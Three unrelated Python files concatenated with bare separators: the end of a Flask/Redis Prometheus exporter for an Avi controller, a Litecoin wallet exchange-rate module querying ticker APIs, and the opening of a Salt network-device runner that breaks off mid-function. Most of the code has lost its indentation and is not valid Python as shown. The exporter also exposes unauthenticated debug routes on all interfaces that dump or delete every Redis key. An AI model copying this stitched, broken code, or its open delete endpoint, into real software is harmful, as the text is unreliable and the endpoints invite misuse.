pool_metric_list = remove_version_specific_metrics('pool',pool_metric_list)
_metric_list = pool_metric_list.replace('.','_').split(',')
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in pool_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
#----- filter by UUID
if uuid_list !='*':
list_to_remove = []
for l in pool_metrics:
if "# " not in l:
if l.split('uuid="')[1].split('"',1)[0] not in uuid_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
#----- filter by tenant
else:
list_to_remove = []
for l in pool_metrics:
if "# " not in l:
if l.split('tenant="')[1].split('"',1)[0] not in tenant_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
#----- filter by cloud
if '*' not in cloud_list:
list_to_remove = []
for l in pool_metrics:
if "# " not in l:
if l.split('cloud="')[1].split('"',1)[0] not in cloud_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
    #----- remove empty comment lines
list_to_remove = []
_mlist = []
for l in pool_metrics:
if "# " not in l:
_mlist.append(l.split(' ')[0])
for l in pool_metrics:
if "# " in l:
if l.split(' ')[2] not in _mlist:
list_to_remove.append(l)
if len(list_to_remove) > 0:
for e in list_to_remove:
pool_metrics.remove(e)
#-----
pool_metrics.append('\n')
pool_metrics = '\n'.join(pool_metrics)
return pool_metrics
def pool_metrics(request):
try:
if r.get('pool_last_poll_time') == None:
r.set('pool_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('pool_last_poll_start_time') == None:
r.set('pool_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('pool_metrics') == None:
r.set('pool_metrics',pickle.dumps([]))
if r.get('pool_polling') == None:
r.set('pool_polling', 'False')
if time.time() - float(r.get('pool_last_poll_start_time')) > metric_refresh_interval and r.get('pool_polling') == 'False':
pool_metrics_params(request)
if wait_for_cache == False:
pool_metrics = pool_filter_metrics(request)
p = Process(target = pool_static.refresh_pool_metrics, args = (r,login,avi_controller,))
p.start()
else:
pool_static.refresh_pool_metrics(r,login,avi_controller)
pool_metrics = pool_filter_metrics(request)
return pool_metrics
else:
print(str(datetime.now())+' =====> Using cached Pool metrics')
pool_metrics_params(request)
pool_metrics = pool_filter_metrics(request)
#pool_metrics = pickle.loads(r.get('pool_metrics'))
if time.time() - float(r.get('pool_last_poll_time')) > (metric_refresh_interval * 2):
r.set('pool_metrics',pickle.dumps([]))
if r.get('pool_polling') == 'True':
r.set('pool_polling', 'False')
return pool_metrics
except:
r.set('pool_polling','False')
print(str(datetime.now())+' '+avi_controller+': func pool_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- GET controller member-specific statistics
#----- build lists for requested params, allows multiple job servers to scrape different metrics
def controller_metrics_params(request):
if r.get('ctl_metric_id') == None:
r.set('ctl_metric_id',pickle.dumps({}))
if r.get('ctl_runtime') == None:
r.set('ctl_runtime',pickle.dumps({}))
d=request.args.to_dict()
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_controller_metric_list
controller_metric_list = remove_version_specific_metrics('controller',metric_id)
_metric_list = controller_metric_list.split(',')
#---- define metric id list
_controller_metric_id = pickle.loads(r.get('ctl_metric_id'))
for m in _metric_list:
_controller_metric_id[m] = time.time()
_removal = []
for m in _controller_metric_id:
if (time.time() - _controller_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_controller_metric_id.pop(m, None)
r.set('ctl_metric_id', pickle.dumps(_controller_metric_id))
#---- define ctl runtime
_ctl_runtime = pickle.loads(r.get('ctl_runtime'))
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
_ctl_runtime['true'] = time.time()
_removal = []
for t in _ctl_runtime:
if (time.time() - _ctl_runtime[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_ctl_runtime.pop(t, None)
r.set('ctl_runtime', pickle.dumps(_ctl_runtime))
#---- filters metrics from cache to return only what's requested in the Prometheus requests
def controller_filter_metrics(request):
ctl_metrics = pickle.loads(r.get('ctl_metrics'))
ctl_metrics_runtime = pickle.loads(r.get('ctl_metrics_runtime'))
d=request.args.to_dict()
if 'metric_id' in d:
ctl_metric_list = request.args.get('metric_id').lower()
else:
ctl_metric_list = default_controller_metric_list
ctl_metric_list = remove_version_specific_metrics('controller',ctl_metric_list)
_metric_list = ctl_metric_list.replace('.','_').split(',')
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
_metric_list = _metric_list + ctl_metrics_runtime
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in ctl_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
ctl_metrics.remove(e)
ctl_metrics.append('\n')
ctl_metrics = '\n'.join(ctl_metrics)
return ctl_metrics
def controller_metrics(request):
try:
if r.get('ctl_last_poll_time') == None:
r.set('ctl_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('ctl_last_poll_start_time') == None:
r.set('ctl_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('ctl_metrics') == None:
r.set('ctl_metrics',pickle.dumps([]))
if r.get('ctl_polling') == None:
r.set('ctl_polling', 'False')
if r.get('ctl_metrics_runtime') == None:
r.set('ctl_metrics_runtime',pickle.dumps([]))
if time.time() - float(r.get('ctl_last_poll_start_time')) > metric_refresh_interval and r.get('ctl_polling') == 'False':
r.set('ctl_polling','True')
controller_metrics_params(request)
if wait_for_cache == False:
ctl_metrics = controller_filter_metrics(request)
p = Process(target = controller_static.refresh_ctl_metrics, args = (r,login,avi_controller,))
p.start()
else:
controller_static.refresh_ctl_metrics(r,login,avi_controller)
ctl_metrics = controller_filter_metrics(request)
return ctl_metrics
else:
print(str(datetime.now())+' =====> Using cached Controller metrics')
controller_metrics_params(request)
ctl_metrics = controller_filter_metrics(request)
if time.time() - float(r.get('ctl_last_poll_time')) > (metric_refresh_interval * 2):
r.set('ctl_metrics',pickle.dumps([]))
if r.get('ctl_polling') == 'True':
r.set('ctl_polling', 'False')
return ctl_metrics
except:
r.set('ctl_polling', 'False')
        print(str(datetime.now())+' '+avi_controller+': func controller_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#-------------------------
app = Flask(__name__)
@app.route('/metrics', methods=['GET'])
def add_message():
try:
req_start_time = time.time()
d=request.args.to_dict()
avi_login()
if request.args.get('entity_type').lower() == 'virtualservice':
if 'kubernetes_namespace' in d:
metrics = virtualservice_servicediscovery_metrics(request)
else:
metrics = virtualservice_metrics(request)
#print metrics
elif request.args.get('entity_type').lower() == 'serviceengine':
metrics = serviceengine_metrics(request)
#print metrics
elif request.args.get('entity_type').lower() == 'controller':
metrics = controller_metrics(request)
#print metrics
elif request.args.get('entity_type').lower() == 'pool':
metrics = pool_metrics(request)
#print metrics
else:
return '', 500
req_total_time = str(time.time()-req_start_time)
print(str(datetime.now())+' =====> request took '+req_total_time+' seconds\n')
if metrics == False:
return '', 500
elif metrics.split('|')[0] == 'ERROR':
return metrics.split('|')[2], int(metrics.split('|')[1])
else:
return metrics, 200
except:
exception_text = traceback.format_exc()
        print(str(datetime.now())+' '+avi_controller+': '+exception_text)
        return '', 500
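# Illustrative scrape examples for the /metrics endpoint (the pool metric name is an assumption):
#   curl 'http://localhost:8080/metrics?entity_type=controller&runtime=true'
#   curl 'http://localhost:8080/metrics?entity_type=pool&metric_id=l4_server.avg_bandwidth'
#   curl 'http://localhost:8080/metrics?entity_type=virtualservice&kubernetes_namespace=default&virtualservice=my-vs'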
@app.route('/virtualservice_debug', methods=['GET'])
def vs_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('vs_last_poll_time')))
_2 = '\n<p>=====></p>\n'
_3 = '\n<p>'+str(pickle.loads(r.get('vs_results')))+'</p>\n'
_4 = '\n<p>'+str(pickle.loads(r.get('vs_metrics')))+'</p>\n'
_5 = '\n<p>=====> VS without METRICS %s</p>\n' %str(pickle.loads(r.get('vs_missing_metrics')))
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Virtualservice metrics polling hasn't run yet\n", 200
@app.route('/servicediscovery_debug', methods=['GET'])
def sd_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('sd_last_poll_time')))
_2 = '\n<p>=====></p>\n'
_3 = '\n<p>'+str(pickle.loads(r.get('sd_names')))+'</p>\n'
_4 = '\n<p>'+str(pickle.loads(r.get('sd_targets')))+'</p>\n'
_5 = '\n<p>'+str(pickle.loads(r.get('sd_metrics')))+'</p>\n'
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Servicediscovery metrics polling hasn't run yet\n", 200
@app.route('/serviceengine_debug', methods=['GET'])
def se_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('se_last_poll_time')))
_2 = '=====>'
_3 = '\n<p>'+str(pickle.loads(r.get('se_results')))+'</p>\n'
        _4 = '\n<p>'+str(pickle.loads(r.get('se_metrics')))+'</p>\n'
_5 = '\n<p>=====> Serviceengine without METRICS %s</p>\n' %str(pickle.loads(r.get('se_missing_metrics')))
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Serviceengine metrics polling hasn't run yet\n", 200
@app.route('/pool_debug', methods=['GET'])
def pool_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('pool_last_poll_time')))
_2 = '=====>'
_3 = '\n<p>'+str(pickle.loads(r.get('pool_results')))+'</p>\n'
        _4 = '\n<p>'+str(pickle.loads(r.get('pool_metrics')))+'</p>\n'
_5 = '\n<p>=====> Pools without METRICS %s</p>\n' %str(pickle.loads(r.get('pool_missing_metrics')))
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Pool metrics polling hasn't run yet\n", 200
@app.route('/redis_debug', methods=['GET'])
def redis_debug():
try:
d=request.args.to_dict()
if 'key' in d:
key = request.args.get('key').lower()
try:
value = str(pickle.loads(r.get(key)))
except:
value = str(r.get(key))
_1 = '\n<p>=====> Redis Key %s</p>\n' %key
_2 = value+'</p>\n'
response = _1+_2
return response, 200
else:
_1 = '\n<p>=====> All Redis Keys </p>\n'
response = []
for key in r.scan_iter("*"):
response.append(key)
response = sorted(response)
            if 'avi_login' in response:
                response.remove('avi_login')
response = ('\n'.join(response))+'\n'
response = _1+response
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Redis Debug has an error\n", 500
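# Illustrative debug calls (which keys exist depends on what has been cached so far):
#   GET /redis_debug                      -> lists all Redis keys populated by this exporter
#   GET /redis_debug?key=pool_metrics     -> unpickles and dumps a single cached key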
@app.route('/redis_delete', methods=['GET'])
def redis_delete():
try:
d=request.args.to_dict()
if 'key' in d:
key = request.args.get('key').lower()
r.delete(key)
            _1 = '\n<p>=====> Deleted Redis Key %s</p>\n' %key
            response = _1
return response, 200
else:
_1 = '\n<p>=====> Deleted All Redis Keys </p>\n'
response = []
for key in r.scan_iter("*"):
response.append(key)
r.delete(key)
response = sorted(response)
if 'avi_login' in response:
response.remove('avi_login')
response = ('\n'.join(response))+'\n'
response = _1+response
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Redis Flush has an error\n", 500
try:
r = redis.Redis(host='localhost', port=6379, db=0)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8080, threaded=True)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob, make_dir
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
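# Illustrative effect: a precision of 0 (e.g. JPY) formats fiat amounts with no decimal places, 3 (e.g. BHD)
# with three, and any currency not listed falls back to 2 decimal places (see FxThread.ccy_amount_str below).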
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
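# Illustrative sketch of how the exchange classes below plug in (kept commented out on purpose:
# any real ExchangeBase subclass defined in this module is picked up by get_exchanges_and_currencies()
# and written into currencies.json; the endpoint and fields here are hypothetical):
#
# class ExampleExchange(ExchangeBase):
#     def get_rates(self, ccy):
#         json = self.get_json('api.example.com', '/ticker/ltc')  # hypothetical endpoint
#         return {'USD': Decimal(json['last'])}
#     def history_ccys(self):
#         return ['USD']
#     def request_history(self, ccy):
#         # expected to return a dict of 'YYYY-MM-DD' -> rate
#         return self.get_json('api.example.com', '/history/ltc%s' % ccy)  # hypothetical endpoint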
class Bit2C(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bit2c.co.il', '/Exchanges/LTCNIS/Ticker.json')
return {'NIS': Decimal(json['ll'])}
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("LTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/LTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['LTC'][r]) for r in json['LTC']
if json['LTC'][r] is not None] # Giving NULL sometimes
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=LTC")[ccy +'_LTC']
class Bitfinex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitfinex.com', '/v1/pubticker/ltcusd')
return {'USD': Decimal(json['last_price'])}
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v3/ticker/?book=ltc_mxn')
return {'MXN': Decimal(json['payload']['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/v2/ticker/ltcusd/')
return {'USD': Decimal(json['last'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=LTC')
rates = json['data']['rates']
return dict([(k, Decimal(rates[k])) for k in rates])
class CoinSpot(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.coinspot.com.au', '/pubapi/latest')
return {'AUD': Decimal(json['prices']['ltc']['last'])}
class GoCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('x.g0cn.com', '/prices')
ltc_prices = json['prices']['LTC']
return dict([(r, Decimal(ltc_prices[r])) for r in ltc_prices])
class HitBTC(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
json = self.get_json('api.hitbtc.com', '/api/1/public/LTC%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['last'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
pairs = [k for k in dicts['result'] if k.startswith('XLTCZ')]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
ccys = [p[5:] for p in pairs]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['result']['XLTCZ'+ccy]['c'][0])
return result
def history_ccys(self):
return ['EUR', 'USD']
def request_history(self, ccy):
query = '/0/public/OHLC?pair=LTC%s&interval=1440' % ccy
json = self.get_json('api.kraken.com', query)
history = json['result']['XLTCZ'+ccy]
return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
for t in history])
class OKCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.okcoin.com', '/api/v1/ticker.do?symbol=ltc_usd')
return {'USD': Decimal(json['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('www.mercadobitcoin.net', '/api/ltc/ticker/')
return {'BRL': Decimal(json['ticker']['last'])}
class TheRockTrading(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.therocktrading.com',
'/v1/funds/LTCEUR/ticker')
return {'EUR': Decimal(json['last'])}
class QuadrigaCX(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.quadrigacx.com', '/v2/ticker?book=ltc_cad')
return {'CAD': Decimal(json['last'])}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/ltc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/ltc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/ltc_usd')
return {'EUR': Decimal(json_eur['ltc_eur']['last']),
'RUB': Decimal(json_rub['ltc_rur']['last']),
'USD': Decimal(json_usd['ltc_usd']['last'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
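# Illustrative: dictinvert({'Kraken': ['EUR', 'USD'], 'BitStamp': ['USD']}) returns
# {'EUR': ['Kraken'], 'USD': ['Kraken', 'BitStamp']}; used below to map each currency to the exchanges that support it.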
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
make_dir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
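    # Illustrative: with commas=True and a 2-decimal currency the format string becomes "{:,.2f}",
    # so ccy_amount_str(Decimal('1234.567'), True) returns '1,234.57'; a 0-decimal currency such as
    # JPY uses "{:,.0f}" and drops the decimals (example values, not taken from this file).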
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
proxy.py
|
# -*- coding: utf-8 -*-
# Copyright 2019-2020 Mircea Ulinic. All rights reserved.
#
# The contents of this file are licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
'''
Salt Runner to invoke arbitrary commands on network devices that are not
managed via a Proxy or regular Minion. Therefore, this Runner doesn't
necessarily require the targets to be up and running, as it will connect to
collect the Grains, compile the Pillar, then execute the commands.
'''
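# Illustrative runner invocations (minion IDs and functions below are placeholders):
#   salt-run proxy.salt_call edge-router-1 test.ping
#   salt-run proxy.execute_devices "['edge-router-1', 'edge-router-2']" net.arp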
from __future__ import absolute_import, print_function, unicode_literals
# Import Python std lib
import sys
import copy
import json
import math
import time
import hashlib
import logging
import threading
import traceback
import multiprocessing
# Import Salt modules
import salt.cache
import salt.loader
import salt.output
import salt.version
import salt.utils.jid
import salt.utils.master
from salt.ext import six
from salt.minion import SMinion
from salt.cli.batch import Batch
import salt.utils.stringutils
import salt.defaults.exitcodes
from salt.exceptions import SaltSystemExit, SaltInvocationError
from salt.defaults import DEFAULT_TARGET_DELIM
import salt.utils.napalm
import salt.utils.dictupdate
try:
import salt.utils.platform
from salt.utils.args import clean_kwargs
OLD_SALT = False
except ImportError:
OLD_SALT = True
import salt.utils
from salt.utils import clean_kwargs
try:
import progressbar
HAS_PROGRESSBAR = True
except ImportError:
HAS_PROGRESSBAR = False
# ------------------------------------------------------------------------------
# module properties
# ------------------------------------------------------------------------------
_SENTINEL = 'FIN.'
log = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# property functions
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# helper functions -- will not be exported
# ------------------------------------------------------------------------------
def _napalm_is_proxy(opts):
return opts.get('proxy', {}).get('proxytype') == 'napalm'
# Point the native is_proxy function to the above, so it doesn't check whether
# we're actually running under a Proxy Minion
salt.utils.napalm.is_proxy = _napalm_is_proxy
def _is_proxy():
return True
# Same rationale as above, for any other Proxy type.
if not OLD_SALT:
salt.utils.platform.is_proxy = _is_proxy
else:
salt.utils.is_proxy = _is_proxy
def _salt_call_and_return(
minion_id,
salt_function,
ret_queue,
unreachable_devices,
failed_devices,
arg=None,
jid=None,
events=True,
**opts
):
'''
'''
opts['jid'] = jid
ret, retcode = salt_call(
minion_id,
salt_function,
unreachable_devices=unreachable_devices,
failed_devices=failed_devices,
**opts
)
if events:
__salt__['event.send'](
'proxy/runner/{jid}/ret/{minion_id}'.format(minion_id=minion_id, jid=jid),
{
'fun': salt_function,
'fun_args': arg,
'id': minion_id,
'jid': jid,
'return': ret,
'retcode': retcode,
'success': retcode == 0,
},
)
try:
ret = json.loads(json.dumps(ret))
except (ValueError, TypeError):
log.error('Function return is not JSON-serializable data', exc_info=True)
log.error(ret)
ret_queue.put(({minion_id: ret}, retcode))
sys.exit(retcode)
def _existing_proxy_cli_batch(
cli_batch, ret_queue, batch_stop_queue, sproxy_stop_queue
):
'''
'''
run = cli_batch.run()
cumulative_retcode = 0
for ret in run:
if not sproxy_stop_queue.empty():
break
retcode = 0
if ret and isinstance(ret, dict):
minion_id = list(ret.keys())[0]
if isinstance(ret[minion_id], dict) and 'retcode' in ret[minion_id]:
retcode = ret[minion_id].pop('retcode')
ret_queue.put((ret, retcode))
